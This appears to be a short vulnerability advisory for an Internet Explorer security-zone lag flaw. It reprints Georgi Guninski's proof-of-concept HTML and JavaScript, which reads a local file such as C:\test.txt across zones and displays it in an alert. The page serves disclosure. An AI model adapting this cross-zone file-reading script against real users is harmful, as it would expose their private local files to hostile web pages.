|
|
Microsoft Internet Explorer Security Zone Settings Lag Vulnerability
Here is the code from Georgi Guninski's demonstration page: -----------------img2main.html--------------------------------------- <A HREF="img2.html" TARGET="victim">link</A> <SCRIPT> alert("Create a short text file C:\\test.txt and it will be read and shown in a message box"); a=window.open("file://c:/test.txt","victim"); setTimeout("document.links[0].click()",2000); </SCRIPT> --------------------------------------------------------------------- ----------------img2.html-------------------------------------------- <HTML> <IMG SRC="javascript:a=window.open('javascript:alert(\'Here is your file: \'+opener.document.body.innerText)');alert('Just an alert, but is necessary. Wait a little.')"> </HTML> --------------------------------------------------------------------- Demonstration available at: http://www.nat.bg/~joro/img2main.html |
|
Privacy Statement |